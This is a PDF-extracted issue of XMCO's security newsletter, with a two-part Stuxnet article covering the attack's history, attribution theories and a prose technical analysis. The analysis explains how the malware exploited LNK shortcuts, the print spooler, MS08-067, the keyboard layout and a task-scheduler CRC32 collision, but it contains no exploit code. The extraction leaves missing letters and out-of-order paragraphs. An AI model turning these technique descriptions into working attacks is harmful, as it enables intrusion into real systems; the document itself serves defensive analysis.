Stuxnet: Analysis, Myths, Realities

ACTUSCU 27
XMCO
S REALITIE ND MYTHS A IS, : ANALYS STUXNET
C ON TEN TS
S t u x n et : c om p l e te two-p a rt ar t icle o n T HE vir us o f 2010 K ey b o ard L ayo u t : a n a l ysi s of t he MS10-073 vulner abilit y used by St ux ne t C u r re n t n e w s : Top 10 ha c king t echniques, z ero -day IE, Gsdays 2 0 1 0 , P ro FTP D. .. B l o g s , s o f t wares an d o u r fav orite Twe e ts...
This document is the property of XMCO Partners. Any reproduction is !!!!!!!!!!!!!!!!! strictly prohibited.
[1]
David Helan
ACTU SCU 27
A re y o u c o n c e r n e d b y I T s e c u ri t y i n y o u r c o m p a n y ? XMCO Partners is a consultancy whose business is IT security audits. Services: Intrusion tests Our experts in intrusion can test your networks, systems and web applications Use of OWASP, OSSTMM and CCWAPSS technologies
Security audit Technical and organizational audit of the security of your Information System
Best Practices ISO 27001, PCI DSS, Sarbanes-Oxley
PCI DSS support Consulting and auditing for environments requiring PCI DSS Level 1 and 2 certication.
CERT-XMCO: Vulnerability monitoring Personalized monitoring of vulnerabilities and the xes affecting your Information System
CERT-XMCO: Response to intrusion Detection and diagnosis of intrusion, collection of evidence, log examination, malware autopsy
About XMCO Partners: Founded in 2002 by experts in security and managed by its founders, we work in the form of xed-fee projects with a commitment to achieve results. Intrusion tests, security audits and vulnerability monitoring are the major areas in which our rm is developing. At the same time, we work with senior management on assignments providing support to heads of informationsystems security, in drawing up master plans and in working on awareness-raising seminars with several large French accounts.
To contact XMCO Partners and discover our services: http://www.xmco.fr
[2]
WWW.XMCO.FR
FEB. 2011
EDITORIAL
certainly be implementation errors that may be exploited by pirates, especially as these are particularly ingenious concerning hacking means of payment. We hope that you nd this issue interesting and we look forward to seeing you at Black Hat Barcelona, for which XMCO is a partner.
Frdric Charpentier Chief Technology Ofcer
2 UMBER N
We wish you a happy 2011

This is the rst issue of ActuScu in 2011. As usual, a very busy year end made us a little late in writing this issue. The XMCO team is strengthened with the arrival of Florent Hochwelker, a security consultant coming from SkyRecon. The security of the Windows kernel, DEP bypass and other tricks for happily causing memory overows no longer hold any secrets for him. Florent has also written its rst article in this issue.
ACTUSECU
Editor in chief: Adrien GUINAULT Contributors: Charles DAGOUAT Florent HOCHWELKER Stphane JIN Franois LEGUE Frdric CHARPENTIER Yannick HAMON
CONTACT XMCO
What will 2011 bring us in terms of attacks and security? Without wishing to gaze into a crystal ball, it is clear, for me, that 2011 will be the year of m-payment: contactless mobile payments (by NFC or GSM). Although these technologies are, a priori, new, they are based on existing and proven frameworks. There will PCI DSS QSA TRAINING 7 and 8 March in London BLACKHAT EUROPE 16 and 17 March in Barcelona actu_secu@xmco.fr info@xmco.fr
THE XMCO AGENDA
BLACK HAT
[3]
STUXNET PART I
P. 5 P. 52 P. 13
BOOKMARKS AND TOOLS
CONTENTS
STUXNET...
...PART II
Stuxnet Part I: analysis, myths and realities..5 An examination of THE virus of 2010
Stuxnet Part II: technical analysis.................13 Propagation, infection and attacks on industrial systems.
Keyboard Layout vulnerability......................29
KEYBOARD LAYOUT
Analysis of the "elevation of privileges" vulnerability
P. 29
used by Stuxnet (MS10-073).
Current news..................................................38 Top Ten hacking techniques, zero-day IE, GS Days, ProFTPD...
Blogs, software and extensions...................52 IMA, VMware compliance checker, Twitter and the rn_101 blog.
CURRENT NEWS
P. 38
XMCO 2011
[4]
ACTU SCU 27
STUXNET PART I: HISTORY, MYTHS AND REALITIES
Stuxnet, elected malware of the year
ACTU SCU 27
It would have been inconceivable not to devote an article to THE malware of the year 2010. Although nearly everything has already been said on this subject, we could not resist wanting to write an article on Stuxnet several months after the media buzz has subsided. Much is still obscure concerning this malware, its origins and its developers. However, we will try to give a summary, also taking an objective view in relation to various papers covering the subject.
Karsten Kneese
If there is one thing to remember about 2010, it is surely the case of Stuxnet. This is because this malware, specically produced to carry out the second highlypublicized targeted attack of 2010 (after Aurora) caused comment for more than six months! This article is intended as a summary of this long period, which was punctuated by many new developments. It covers the development of the discoveries and announcements that took place during this period and tries to analyze all the facts in order to draw conclusions. Between reminders on technical matters, genuine rumors and false realities, this article will appraise the situation as completely as possible.
Stuxnet is a complex piece of malware
To quickly reach its target, the malware also uses a password dened by default within certain SCADA (Supervisory Control And Data Acquisition) systems. This is based on the Siemens SIMATIC WinCC software.
constructed from many items, intended to sabotage the normal functioning of certain critical systems.
Thanks to all the work performed by various researchers with an interest in malware, the role of Stuxnet has been claried. The malicious code acts in several stages: rstly, a removable item of storage media is used to compromise a system on a local network. Once present on a network, the malware replicates, moving towards the discovery of a point of access to its target: a system on which WinCC is installed. Secondly, when such a target is discovered, the behavior of the various items controlling the target architecture is modied in order to physically impair the integrity of the industrial production system. In the case of Stuxnet, this concerns modifying the normal function of certain critical systems by manipulating their controllers.
Preliminary reminders
Stuxnet is a complex piece of malware constructed from many items, intended to sabotage the normal functioning of certain critical systems. In contrast to the somewhat indiscreet approach which is used to access these sensitive systems, this sabotage is intended to be very discreet. To approach its target, Stuxnet exploits at least four zero-day vulnerabilities (currently all corrected by Microsoft) targeting different versions of Windows, as well as the famous MS08-067 vulnerability that was corrected several years ago.
[5]
WWW.XMCO.FR

History
It is difcult to create a comprehensive history of the events relative to Stuxnet because of the numerous new developments and announcements during this long period. Limiting ourselves to the dates of the discoveries made and publicized by the researchers would not really make sense. It is necessary to consider the period before the media took an interest in this subject, as this attack is so complex. We are therefore going to try, with hindsight, to trace a history that takes into account the dates before the beginning of the media interest in this sabotage campaign. Also, all this takes into account discoveries made after this attack attracted media interest. From Stuxnet Everything ofcially began on 17 June 2010, when the Belarusian company Virusblokada published a report on the virus RootkitTmphider, mentioning the LNK security vulnerability. This vulnerability, which was zero-day in June 2010, allows a pirate to execute code when opening a directory, whether it is shared (SMB, WebDAV), local or on a mass-storage peripheral (external hard disk, USB drive, portable telephone, MP3 player, etc.). The vulnerability gradually began to arouse comment. MITRE dedicated reference CVE-2010-2568 to it the following 30 June, and on 13 July, Symantec added the detection of this virus under the name of W32. Temphid. The next day, on 14 July, MITRE assigned references CVE-2010-2729 and CVE-201 0-2743 to security vulnerabilities present in the print spooler and in the keyboard management. Two days afterwards, on 16 July, Microsoft published a security alert referenced KB2286198. This last concerned the security vulnerability exploited by the malware. The management of LNK les was then clearly identied as problematic by the software publisher. At the same time, VeriSign revoked the certicate belonging to Realtek Semiconductor Corp. This was because it had been used by pirates to sign certain drivers used by their malware. Symantec subsequently revealed that the rst malware, which had a driver signed by the certicate and which was identied as coming from the Stuxnet family, went back to January 2010. On 17 July, the antivirus publisher ESET detected new malware coming from the Stuxnet family. This used a certicate belonging to JMicron Technology Corp. to sign one of its components. On 19 July, a year after ivanlefOu had published a proof of concept, the researcher HD Moore published exploitation code within
ACTU SCU 27
the Metasploit framework. This allowed control of a system to be taken over remotely by exploiting the security vulnerability through WebDAV sharing. This code allowed a pirate simply to encourage an Internet user to visit a web page with Internet Explorer to take control of the underlying system. The same day Symantec renamed W32. Temphid to W32.Stuxnet, and Siemens reported that the company was in the process of studying reports referring to the compromise of several SCADA systems linked to WinCC. On 20 July, Symantec announced that it had discovered how the malware communicated with its command and control (C&C) servers, and the meaning of the exchanged messages. On 21 July, MITRE assigned reference CVE-2010-2772 to the security vulnerability present within the Simatic WinCC and PCS 7 software from Siemens. A password had been hard-coded and could be used to access certain components of Siemens applications with elevated privileges. Two days afterwards, on 23 July, VeriSign revoked the certicate belonging to JMicron Technology Corp.
On
17 July, Symantec renamed "W32.Temphid" as "W32.Stuxnet" and Siemens reported that the company was in the process of studying reports referring to the compromise of several SCADA systems linked to WinCC
Then several days passed, during which the researchers and specialists involved in this study certainly did not stop working. On 2 August, outside its "Patch Tuesday" cycle, Microsoft published its security bulletin MS10-046 proposing several patches for the LNK vulnerability. On 6 August, Symantec presented the method used by Stuxnet to inject and hide code on a PLC (Programmable Logic Controller). On 14 September, Microsoft published a new security bulletin (MS10-061) and offered a patch for the security vulnerability present within the print spooler that was discovered by Symantec in August. The same day, MITRE assigned reference CVE-2010-3338 to the "elevation of privileges" vulnerability that was identied within the task scheduler. Just several days afterwards, on 17 September, Joshua J. Drake (jduck1337) published exploitation code within the Metasploit framework. This allowed control to be taken of a system via the security
This document is the property of XMCO Partners. Any reproduction is !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![6] strictly prohibited.

vulnerability present within the Windows print spooler. Lastly, to end the month of September, the publishers of the antivirus solutions ESET and Symantec published a rst version of their report, on 30 September, presenting their almost-complete analyses of the malware. In fact, both publishers did not wish to disclose information on vulnerabilities that had not yet been corrected by Microsoft. The following month, on 20 November, Joshua J. Drake published new exploitation code within the Metasploit framework to exploit the vulnerability present within the Windows task Scheduler. Finally, to prevent the exploitation of the last security vulnerability exploited by Stuxnet, Microsoft, on its "Patch Tuesday" of 12 October, published its security bulletin MS10-073 that gave a patch for the vulnerability related to the management of the keyboard. Then, after two months of waiting, in its "Patch Tuesday" of 14 December, Microsoft published its security bulletin MS10-092 offering a patch to correct the security vulnerability related to the task scheduler. The progress made by Ralph Langner Thanks to the work done by the German researcher Ralph Langner, which began as soon as the media began to take an interest in the malware, it has been possible to identify numerous trails related to the origin of Stuxnet, to its potential targets and to the people who are hiding behind this attack. Of course, all information published by this former psychologist should be treated with caution. Even so, it appears, with hindsight, that many opinions that he gave have been subsequently validated by other researchers (such as Symantec) or by documents coming from third-party sources. On 16 September, Langner announced that Iran, and particularly the nuclear power station at Bushehr, which was built in cooperation with Russia, was the main target. The researcher was also the rst to speak of cyber war. On each following day, he published new hypotheses and new discoveries. The researcher approached numerous entities, such as Congress, the DHS and the INL in the United States, and also appeared on television. On 13 November, Langner announced, just after Symantec, that he had come to the same conclusions concerning the malicious code 315 and the PLCs targeted. He took advantage of this to present the K-1000-60/3000-3 steam turbines manufactured by the Russian manufacturer "Power Machines" which, according to him, equipped the Bushehr nuclear plant. The following day, he presented his analysis concerning the entity that probably ordered this attack: for him, only a government could have been involved in such a scenario: the complexity of the
ACTU SCU 27
knowledge that was necessary, the human and material resources necessary and lastly, the cost of such an organization make certain countries ideal suspects. Among the list chosen by the researcher were Israel, the United States, Germany and Russia.
Trey Ratcliff
At the end of November, the former psychologist announced that Iran and Venezuela had concluded an agreement in 2008. This alliance allowed Iran to install ballistic missiles on Venezuelan territory in exchange for
WWW.XMCO.FR
On 15 November, Langner presented a technical solution allowing the malicious code 315 to destroy gas centrifuges. He was then supported by the nuclear specialist from ISIS (Institute for Science and International Security), David Albright. On the same day, a second announcement gave the details of the attack performed by the code 417. In the days that followed, numerous details of this second attack were presented and a hypothesis concerning the targets was given: according to the researcher, the code 315 targeted the IR-1 centrifuges present in the Natanz enrichment centre, while module 417 targeted the steam turbines in the electrical power station at Bushehr. A single weapon, malware, which contained two payloads: the code modules 315 and 417, targeting different PLCs.

the help provided by Iran in setting up a nuclear program in the host country. A situation in which the United States would surely not be delighted to nd itself; and therefore, in his opinion, a justication for the establishment of this secret program. At the end of December, helped by the publication of the report from ISIS, which gave an analysis of the nuclear infrastructure situation reported by the inspectors from the International Atomic Energy Agency (IAEA ), Langner announced that he had discovered the precise target of the malware, and more precisely, of block 417. This was the safety system associated with cascades of centrifuges used to enrich uranium. In his opinion, the PLCs targeted were used every two years in the functioning of an enrichment centre such as Natanz.
ACTU SCU 27
agreement, one month before the end of his term of ofce in January 2009, to the establishment of a secret program aiming to sabotage the electrical and computer systems at the main uranium enrichment centre at Natanz. From the beginning of his term of ofce, Barack Obama, who had been informed of this before taking ofce, accelerated this program on the advice of those knowledgeable concerning the case of Iran.
single weapon, malware, which contained two payloads: the code modules 315 and 417, targeting different PLCs ...
At the beginning of January, the researcher presented a new hypothesis on the role of blocks 315 and 417. According to him, their main objective was not the destruction of the centrifuges, but rather to make these production systems massively inefcient. By analyzing the data embedded in the code, and theoretical calculations on the yield of uranium production, the researcher discovered that the operations performed by the two blocks of code would drastically reduce the yield of the centrifuges. To summarize, over the course of these few months, Langner was probably the researcher who communicated most concerning Stuxnet. The "New York Times" theory For the rst time since the beginning of this scenario, an article published by the New York Times on 16 January described a plausible scenario. Even though this scenario is based more on a correlation between events and facts, rather than on tangible proof, these authors have the distinction of being among the rst to ofcially name the various protagonists. It should therefore be taken with caution and is the responsibility only of the journalists who wrote the New York Times article. In this scenario, the United States set up a plan to hinder Iran in its quest to produce nuclear weapons. According to the journalists, President Bush gave his Still according to the New York Times journalists, this program was based on work performed at the Idaho National Laboratory (INL) in partnership with the Department of Homeland Security (DHS) and Siemens. During 2008, they claim that Siemens requested the INL to test the security of its Step7 software used to control a set of industrial systems (tools, probes, etc), using controllers such as PCS7 (Process Control System 7). The results obtained, including numerous security vulnerabilities, were presented in July at a conference that was held in Chicago. Several months later, American diplomacy succeeded in establishing an embargo on certain components necessary to the correct functioning of a uranium enrichment centre. According to a diplomatic cable
WWW.XMCO.FR
Trey Ratcliff

revealed by Wikileaks, in April 2009, 111 Siemens controllers necessary to controlling a uranium enrichment cascade were therefore blocked at the port of Dubai in the United Arab Emirates. At the end of 2010, the Institute for Science and International Security (ISIS) reported that 984 defective controllers had been replaced at the end of 2009 according to a report by inspectors from the IAEA. Strangely, this gure exactly corresponds to the number of Siemens controllers contained within an enrichment cascade. Nevertheless, what is the relationship between these 984 defective controllers and Stuxnet? These controllers were replaced between the end of 2009 and the beginning of 2010, while Stuxnet made its rst public appearance at the beginning of 2010 although it was not yet identied. The article presents Israel as a principal ally of the United States in manufacturing and testing this malware. This "small" country, which is highly advanced technologically, and particularly in cyber-warfare, is alleged to have built a replica of the Natanz enrichment centre in its own nuclear research centre: Dimona. The journalists gave two reasons for this alliance. Among the Americans' other allies, none of them would be able to make the IR-1 centrifuges work properly. These were derived from the Pakistani P-1, which themselves were copied from plans of the German G-1 stolen by the doctor of physics Abdul Qadeer Khan (father of the Pakistani nuclear bomb and in charge of a network specialized in the sale of nuclear material that helped to spread sensitive technology to Iran, North Korea and Libya). The second reason was that Israel had long been openly seeking to prevent Iran from obtaining nuclear weapons.
ACTU SCU 27
Israel of having ordered these assassinations. After this second suspect event, the Iranians took the decision to "hide" Mohsen Fakrizadeh, the third (and last?) nuclear specialist.
Ludo Benoit
Forbes's counter theory Another article published by journalists at Forbes the following day strongly criticized this analysis. According to them, this was based on no tangible proof. Only gestures made by certain diplomats at press conferences and the content of several diplomatic cables revealed by Wikileaks gave any support to the journalists' article. The journalists took advantage of trashing this theory to push their own analysis that was published in December. According to them, the "real" powers behind Stuxnet were Finland and China. The reasoning behind this was that Vacon, the Finnish manufacturer of frequency converters (variable frequency drives) had a manufacturing plant in China. This would mean that China would know precisely which PLCs to target. Furthermore, China is suspected to have access to part of the source code of Windows, which could explain the discovery and use of four zero-day vulnerabilities.
In this scenario described by the Times,

the United States is alleged to have set up a plan to hinder Iran in its attempt to produce nuclear weapons.
According to the authors of this article, other information revealed the magnitude of this American program. Massoud Ali Mohammadi, an Iranian nuclear specialist, was killed in January 2010 by an explosion caused by a remotely-triggered bomb xed to a motorbike. On 29 November 2010, when Iran recognized for the rst time that Natanz had suffered damage related to Stuxnet, a second physicist, Majid Shahriari, was the victim of a second fatal "accident". On both of these occasions, president Mahmoud Ahmadinejad directly accused the United States and
WWW.XMCO.FR

Numerous other details relating China and Finland were also revealed by the journalists to support their theory. For example, RealTek Semiconductor, the Taiwanese company whose certicate was stolen to sign the drivers, has an establishment in the industrial zone of Suzhou, in China, not far from Vacon. Finally, China was relatively untouched by the worm.
ACTU SCU 27
and rescue, was controlled by a SCADA system based on Siemens S7-400 and SIMATIC WinCC PLCs. This announcement occurred during a complex period in Indo-Chinese relationships, because both countries are ercely competing with each other in the aerospace sector to be the rst Asian country to put a man on the moon. Although Symantec and other publishers of anti-virus software named Iran as the main victim of Stuxnet, it was not before mid-October that the subject of Stuxnet was publicly mentioned by Iran. During this rst speech, the Iranian president simply denied the damage that the worm was supposed to have caused to national infrastructure. A month later, in November, the country recognized for the rst time that it had suffered "slight" problems leading to the postponement of the launch of the Bushehr plant. In reaction to this attack, the government arrested some Russian service contractors suspected of being spies. These were subsequently released Since the beginning of 2011, numerous other events were added to this story. Symantec, by recovering samples obtained from various publishers of antivirus software in the market, was able to make a statistical study of the attacks.
Lastly, very many international experts criticized the quality of the code in the malware. Several commentators criticized the amateurism of certain functionalities of Stuxnet: the very basic component that communicates with the C&C servers (for example, no communications encryption, the lack of robustness of the control servers, etc), the absence of additional protection (polymorphism, anti-debug and robust encryption), and nally an indiscreet means of proliferation that is unworthy of an attack carried out discreetly by the military, etc. According to these commentators, just these observations are evidence that no government is hiding behind Stuxnet.
The other factors to be remembered On 9 July, the Indian satellite INSAT-4B was declared inoperable. This satellite, which was used for transmitting telecommunications, television broadcasting, meteorology and for individual search
From these samples Symantec was able to produce graphs representing the proliferation of the malware. For this, the researchers used the information recorded (date and time, for example) by the malware when it
WWW.XMCO.FR
So, thanks to the 3,280 samples recovered from ESET, F-Secure, Kaspersky, Microsoft, McAfee and Trend Micro, Symantec was able to draw the following conclusions: - exactly ve organizations were targeted; these ve organizations are all present in Iran; - most of the 12,000 infections corresponding to the 3,280 samples can be traced to these various organizations; - among the victims used as vectors for propagation, three were attacked once, one was targeted twice and the third was attacked three times; - these attacks took place at very precise dates: in June 2009, one month later in July 2009, then at three further stages in March, April and May 2010; - lastly, three variants of the malware corresponding to the attacks that took place in June 2009, April 2010 and May 2010 were observed. The existence of a fourth variant is assumed but has not been observed among the samples obtained. According to Symantec, these ve companies are suppliers with links to the Natanz enrichment centre.
Ludo Benoit

infects a new system. These graphs clearly highlight the ve dates corresponding to the attacks and the number of targets initially contaminated during each of these events.
ACTU SCU 27
In
April 2009, the researcher Carsten Kohler published an article in the magazine Hackin9 presenting a security vulnerability within the Windows print spooler. No one reacted, not even Microsoft, which was clearly concerned.
The day after this announcement, several media echoed another announcement that was particularly surprising. During a video shown at a party given in honor of the retirement of general Gabi Ashkenazi, and published by the conservative newspaper Haaretz, it was claimed that the newly-retired general had supervised the creation of Stuxnet. Nevertheless, as no ofcial Israeli source has corroborated this announcement, it must be taken with caution. Lastly, it was in March 2010 that the rst malware in the Stuxnet family appeared which exploited the LNK vulnerability.
The warning signs The Stuxnet affair began well before 2010. Thus, Symantec was able to nd traces of the malware going back to 2008. On 20 November 2008, Symantec observed the exploitation of the LNK vulnerability for the rst time. This had not been analyzed at the time and we had to wait until the appearance of Stuxnet to discover that pirates had known about this vulnerability for more than two years. The virus in question was then identied as "Trojan.Zlob" and does not appear to be related to Stuxnet. In April 2009, the researcher Carsten Kohler published an article in the magazine Hackin9 presenting a security vulnerability within the Windows print spooler. No one reacted, not even Microsoft, which was clearly concerned! Several months later, in June 2009, Symantec detected a new malware that is now identied as the rst version of Stuxnet. This was very simple and did not carry all of the payloads that we know today. According to Symantec, it was in January 2010 that the rst malware in the Stuxnet family appeared using the certicate from Realtek Semiconductor Corp. to sign one of the components of the malware.
Conclusion
Stuxnet has caused a lot of comment and been highly publicized. The various theories, analyses and hypotheses made until now do not allow any conclusions to be drawn with certainty, either concerning those ordering the attacks or the targets. However, according to the various discoveries made by several researchers and journalists (Symantec, Langner and the New York Times), Iran seems to have been targeted, especially the nuclear enrichment centre at Natanz. Concerning those ordering the attack, and bearing in mind its complexity, the resources used and the different information revealed by the journalists,
information revealed by the various observers is always subjective
WWW.XMCO.FR
Israel and the USA appear to have played a role in this affair. We must also bear in mind that all of the

References
Resources on Stuxnet http://blog.eset.com/2011/01/03/stuxnet-informationand-resources
ACTU SCU 27
F-Secure (FAQ) h t t p : / / w w w. f - s e c u r e . c o m / w e b l o g / a r c h i v e s / 00002040.html h t t p : / / w w w. f - s e c u r e . c o m / w e b l o g / a r c h i v e s / 00002066.html " Timeline http://www.infracritical.com/papers/stuxnet-timeline.txt " CERT-IST h t t p : / / w w w. c e r t - i s t . c o m / f r a / r e s s o u r c e s / Publications_ArticlesBulletins/VersVirusetAntivirus/ stuxnet/ " " New York Times http://www.nytimes.com/2011/01/16/world/middleeast/ 16stuxnet.html?pagewanted=all http://www.nytimes.com/2010/11/30/world/middleeast/ 30tehran.html?pagewanted=print http://www.nytimes.com/2010/01/13/world/middleeast/ 13iran.html?_r=1&pagewanted=print " Forbes http://blogs.forbes.com/jeffreycarr/2011/01/17/the-newyork-times-fails-to-deliver-stuxnets-creators/? boxes=Homepagechannels http://blogs.forbes.com/rewall/2010/12/14/stuxnetsnnish-chinese-connection/
WWW.XMCO.FR
ACTU SCU 27
STUXNETPART II: TECHNICAL ANALYSIS
Stuxnet, elected malware of the year
After having looked at the history of Stuxnet and the theories and assumptions behind it, let us now look at its technical analysis. Some very good white papers (Symantec and ESET) have given a detailed presentation of the complexity of this malware. We will try to summarize everything to give an understanding of the propagation modes used, the relationships with industrial systems and the consequences that Stuxnet may cause.
Bjoern Schwarz
Charles Dagouat
General functioning
Stuxnet is a complex piece of malware. Its functioning mode revolves around two main "functions": the propagation of the virus, which is based upon the vulnerabilities inherent in the Windows platform, and the attack on SCADA systems, which is focused on WinCC and PCS7. This second function corresponds to the payload transported by the malware. It is based on the software component WinCC. WinCC is a very widespread tool for remote monitoring and data acquisition developed by Siemens. Installed on a Windows system, it is used to control an automatic system such as a Programmable Logic Controller (PLC). This type of architecture is particularly adapted to critical infrastructure such as can be found in industry. To fulll its task, Stuxnet's functioning is governed by a very specic scenario. The architecture of the malware is built around several main functionalities that correspond to the different stages in the attack process. The rst stage is not characteristic of Stuxnet, but corresponds to the majority of worms: it is the propagation phase. During this phase, the malware seeks to spread within a given area. the local network.
The second phase corresponds to the attack itself: this is the search for a target.
Stuxnet is a complex piece of malware. Its functioning mode revolves around two main "functions": the propagation of the virus, which is based upon the vulnerabilities inherent in the Windows platform, and the attack on SCADA systems, which is focused on WinCC and PCS...
In the case of Stuxnet, the target is a Siemens WinCC control and monitoring system linked to certain PLCs. If such a system is detected, its behavior is then discreetly impaired. Lastly, the nal phase corresponds to the material consequence of this modication. The undetectable effect discreetly acts on the system in order to slowly destroy it.
[13]
WWW.XMCO.FR
STUXNET PART II: TECHNICAL ANALYSIS

Phase I: malware propagation
Phase 1 of the attack carried out by Stuxnet therefore corresponds to the proliferation of the malware within an installed base of computers. For this, the authors of Stuxnet used no less than four zero-day vulnerabilities targeting various components of Windows. But this propagation function may itself be subdivided into several sections: the rst corresponds to compromising Windows systems and the second corresponds to the long-term installation of the virus on a compromised system. The main points of entry chosen by the developers of Stuxnet to penetrate the target infrastructure are removable storage media such as USB drives and other portable hard drives. Those behind the attack are therefore mainly relying on human intervention to carry the virus from one system to another. Main attack vector: removable storage media The vulnerability in question is related to how the Windows operating system manages shortcuts. This type of le corresponds to the extensions ".LNK" and ".PIF". More precisely, the vulnerability relates to the way that the icon for the link is loaded. This image is normally loaded from a CPL (Windows Control Panel) le using the system function "LoadLibraryW()". In reality, a CPL le is just a DLL. By specifying the appropriate information as the access path to a malicious DLL in the section "File Location Info" of a LNK le, a pirate is therefore able to force any Windows system to execute arbitrary code by simply displaying the content of a directory.
ACTU SCU 27
Exploitation of this vulnerability simply requires a user to open a malicious directory. Exploitation code has already been published within the Metasploit framework. Using this, a pirate only needs to get an Internet user to access an Internet address with Internet Explorer to take control of the remote system. In this proof of concept, the server forces the client to open a shared le using the WebDAV protocol.
The authors of Stuxnet used no less than

four zero-day vulnerabilities targeting various components of Windows...
A user observing the content of a USB drive infected by Stuxnet can see the following six les: - Copy of Shortcut to.lnk ; - Copy of Copy of Shortcut to.lnk ; - Copy of Copy of Copy of Shortcut to.lnk ; - Copy of Copy of Copy of Copy of Shortcut to.lnk ; - ~WTR4141.TMP; - ~WTR4132.TMP. The various shortcuts entitled "Copy of (... ) Shortcut tO.lnk" correspond to different versions of Windows. These links all load the library "-WTR4141.tmp" which, in turn, loads the le "-WTR4132.TMP".
WWW.XMCO.FR
After having ofcially acknowledged the security vulnerability by publishing the security alert referenced KB2286198 on 16 July, Microsoft quickly reacted by publishing its bulletin MS 10-046 and the associated patches on 2 August, outside its "Patch Tuesday", which was planned for eight days later, the following 10 August.

Additional attack vectors: local network However, Stuxnet does not only rely on help from users to spread. For this, it also uses two other security faults that can be remotely exploited within a local network. The rst relates to the Microsoft print spooler, while the second targets the old vulnerability present within the server service (MS08-067). Print spooler This security vulnerability was initially presented in the magazine Hackin9 during 2009. When a printer is shared on a system, a user is able to "print" (read and write) les in the "%System%" directory. Exploitation of this security vulnerability takes place in two phases. The rst consists of depositing the les "winsta.exe" and "sYsnuIlevnt.m0f" respectively in the directories "Windows\System32" and "Windows\System32\wbem \mof". The second phase in exploiting this vulnerability consists of executing the script "sysnullevnt.mof". This le, in MOF ("Managed Object Format"), is used to force Windows to execute the code contained in the le "winsta.exe". Execution of this script is automatic. This is because the MOF les placed in the directory "Windows\System32\wbem\mof" are automatically compiled by "mofcomp.exe" to record the WMI context that triggers the execution of the script. This security vulnerability was corrected by Microsoft when it published its bulletin MS10-061, which added a series of checks before allowing a document to be printed.
ACTU SCU 27
installed on a Windows system, the malware has several functionalities that allow it to work as part of a network. Among these, the malware installs an RPC server that allows it to communicate various items of information with other infected systems present on the LAN.
INFO
Provision of free tools for getting rid of malware, including Stuxnet.
BitDefender and Microsoft have just made free tools available for getting rid of the most currently-fashionable malware. After publishing a tool last month for getting rid of Zeus (see CXA-2010-1211), BitDefender has just published another tool for deleting the Stuxnet malware. As a reminder, the malware was detected for the first time by a company based in Belarus (see CXA-2010-0893), following the discovery of the zero-day LNK security vulnerability affecting all versions of Windows (see CXA-2010-0906). Microsoft has just updated its "malicious software removal tool", which can now deal with the most virulent botnet that is currently known: Zeus/ ZBot. Zeus is malware that is constantly being developed, and which mainly aims to steal banking information. The two tools can be downloaded via the following links: Sutxnet: http://www.malwarecity.com/community/ index.php?app=downloads&showfile=12
Server service Lastly, Stuxnet exploits the old MS08-067 security vulnerability in the server service. This vulnerability, which at the time was massively exploited by Conkerl Downadup, is used here to deposit a le in shared directories of the C$ or Admin$ type. The execution of this le is planned the day following compromise, using the task scheduler. It appears that the shell code used by the malware to carry out these two actions is relatively advanced, in contrast to that which was used by Conker. This security vulnerability was corrected by Microsoft when it published bulletin MS08-067. " " " The exploitation of these various security vulnerabilities allows malware to distribute itself both on a local network and, more widely, on all systems on which users can connect removable storage media. Once
Zbot: http://blogs.technet.com/b/mmpc/archive/ 2010/10/12/msrt-on-zbot-the-botnet-in-abox.aspx
WWW.XMCO.FR

Phase II: installation of the malware
The long-term installation of the malware requires certain actions that involve elevated privileges. The exploitation of the security vulnerabilities presented previously does not allow elevated privileges to be obtained. In order to ensure maximum dissemination, two security vulnerabilities are therefore exploited by Stuxnet in order to elevate its privileges once the system has been compromised. These two vulnerabilities cover all existing versions of Windows. The rst can locally elevate its privileges on old versions of the operating system: Windows 2000 and XP; while the second can perform the same operation on more recent versions of the OS: Windows Vista, 7 and 2008. The rst vulnerability relates to the way the keyboard is managed by the driver "Win32k.sys". An index is loaded from a shared library without verication. This operation allows the malware to force the system's kernel to execute code controlled from the user area. This security vulnerability is described in detail in the article on page 29 and was corrected by Microsoft when it published its bulletin MS10-073, which added a check to prevent the use of an index that overowed the table of associated data. The second vulnerability relates to the task scheduler. The denition of a task is stored in an ordinary XML le contained in the directory "%SystemRoot% \system32\Tasks". Access to this directory is restricted. Even so, an XML le (corresponding to a task) contained in it is accessible and can be written to by the user who added it. Secondly, the description XML le contains, among other things, information related to the execution of the task; for example: the user and the required level of privileges. A user who dened a task can therefore freely change the identier of the user and the level of privileges required, in order to elevate privileges. To protect against this type of attack, Microsoft therefore introduced a "security feature" which calculates a hash of the le corresponding to a task when it is dened. This is checked before the task is executed. But the CRC32 algorithm used for calculating this hash is unfortunately not designed for operations related to security. It is too weak to fulll this role because it is relatively easy to implement collisions. It is actually nothing more than a straightforward CRC calculation of the XML le. By adding data into a commented eld, it is therefore easy to produce a valid le with the same hash as the original, after it has been modied.
ACTU SCU 27
Stuxnet therefore adds a task which calculates the associated CRC32 hash, "manually" changes the le to raise the privileges associated with it, adds a comment eld and lls it with random data to provoke a collision. The task is then executed with the highest privileges. This security vulnerability was corrected by Microsoft when it published bulletin MS10-092, which changed the hash function used. The CRC-32 hash function was replaced by SHA-256. This algorithm is considered secure against collision attacks. There remains an unknown factor. According to Microsoft, these two security vulnerabilities respectively targeted Windows XP and 2000 for the keyboard management, and Windows Vista, 7 and 2008 for the task scheduler. It would appear that the technique used by Stuxnet to install itself on Windows Server 2003 is unknown, or that the malware has excluded this platform from its targets.
Ludo Benoit
WWW.XMCO.FR

Functioning of the malware
The malware can be decomposed into several les. The main module, which takes the form of a DLL, is packed with UPX. This module is executed at the start of an attempt at compromise, whatever the vector (USB drive, network or SQL). As has previously been explained, the malware uses four zero-day Windows vulnerabilities to spread via different vectors (USB and local network). All of these techniques are used to install it on a system. In the most widespread case of infection by opening a directory present on a USB drive, the exploitation of the LNK vulnerability launches execution of the main module. Functionalities provided Among other things, execution of this module launches a rootkit to hide the malicious les present on the USB drive. For this, certain system functions associated with the shared libraries "ntdll.dll" and "kerneI32.dll" are intercepted so that code can be injected, and to hide the presence of various malicious les based on specic criteria (".lnk" with a size of 1,471 bytes and "WTRabcd.tmp" les for which the sum of a, b, c and d modulo 10 is equal to 0). The malware is capable of injecting executable code into running processes or into another process whose name corresponds to that of an antivirus program. These operations mean that it is not necessary to load a le that would risk being detected by an antivirus program.
ACTU SCU 27
